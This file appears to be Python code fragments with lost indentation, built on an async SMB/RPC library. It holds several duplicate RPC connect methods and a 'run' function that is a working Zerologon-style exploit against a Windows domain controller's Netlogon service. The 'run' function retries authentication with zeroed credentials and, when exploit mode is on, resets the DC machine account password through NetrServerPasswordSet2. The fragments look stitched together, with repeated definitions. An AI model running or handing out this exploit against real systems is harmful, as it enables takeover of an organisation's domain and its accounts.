async def connect(self, open=True):
try:
epm = EPM(self.connection, protocol='ncacn_ip_tcp')
_, err = await epm.connect()
if err is not None:
return False, err
stringBinding, _ = await rr(epm.map(even6.MSRPC_UUID_EVEN6))
self.dce = epm.get_connection_from_stringbinding(stringBinding)
self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
_, err = await self.dce.connect()
if err is not None:
return False, err
_, err = await self.dce.bind(even6.MSRPC_UUID_EVEN6)
if err is not None:
return False, err
return True, None
except Exception as e:
return False, e
finally:
if epm is not None:
await epm.disconnect()
async def connect(self, open=False):
try:
epm = EPM(self.connection, protocol='ncacn_ip_tcp')
_, err = await epm.connect()
if err is not None:
raise err
stringBinding, _ = await rr(epm.map(drsuapi.MSRPC_UUID_DRSUAPI))
self.dce = epm.get_connection_from_stringbinding(stringBinding)
#the line below must be set!
self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
_, err = await self.dce.connect()
if err is not None:
raise err
if open == True:
_, err = await self.open()
if err is not None:
raise err
return True, None
except Exception as e:
return False, e
finally:
if epm is not None:
await epm.disconnect()
async def filereader_test(connection_string, filename, proxy=None):
cu = SMBConnectionURL(connection_string)
smb_connection = cu.get_connection()
epm = EPM(smb_connection, protocol='ncacn_ip_tcp')
await rr(epm.connect())
data, exc = await epm.map(drsuapi.MSRPC_UUID_DRSUAPI)
#data, exc = await epm.lookup()
if exc is not None:
raise exc
print(data)
async def connect(self, open=False):
epm = EPM(self.connection, protocol='ncacn_ip_tcp')
await rr(epm.connect())
stringBinding, _ = await rr(epm.map(drsuapi.MSRPC_UUID_DRSUAPI))
self.dce = epm.get_connection_from_stringbinding(stringBinding)
#the line below must be set!
self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
await rr(self.dce.connect())
if open == True:
await rr(self.open())
return True, None
async def run(dc_name, dc_ip, exploit=False):
#exploit = True
#dc_name = 'WIN2019AD'
dc_handle = '\\\\' + dc_name
#dc_ip = '10.10.10.2'
target_computer = dc_name #without $
plaintext = b'\x00' * 8
ciphertext = b'\x00' * 8
# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
flags = 0x212fffff
url = SMBConnectionURL('smb2+ntlm-password://XXX\\aaa:aaa@%s' %
dc_name) # dummy url to speed up the process..
connection = url.get_connection()
async with connection:
epm = EPM(connection, protocol='ncacn_ip_tcp')
_, err = await epm.connect()
if err is not None:
raise err
stringBinding, err = await epm.map(nrpc.MSRPC_UUID_NRPC)
_, err = await epm.connect()
if err is not None:
raise err
dce = epm.get_connection_from_stringbinding(stringBinding)
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
_, err = await dce.connect()
if err is not None:
raise err
_, err = await dce.bind(nrpc.MSRPC_UUID_NRPC)
if err is not None:
raise err
for _ in range(0, MAX_ATTEMPTS):
print('=====================================================')
_, err = await nrpc.hNetrServerReqChallenge(
dce, dc_handle + '\x00', target_computer + '\x00', plaintext)
if err is not None:
raise err
if exploit is False:
server_auth, err = await nrpc.hNetrServerAuthenticate3(
dce, dc_handle + '\x00', target_computer + '$\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + '\x00', ciphertext, flags)
else:
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = b'\x00' * 8
authenticator['Timestamp'] = 0
server_auth, err = await nrpc.hNetrServerPasswordSet2(
dce, dc_handle + '\x00', target_computer + '$\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + '\x00', authenticator, b'\x00' * 516)
if err is not None:
if err.get_error_code() == 0xc0000022:
continue
else:
raise err
if server_auth['ErrorCode'] == 0:
print('Server is vulnerable!')
break
else:
print('FAILED!')
await dce.disconnect()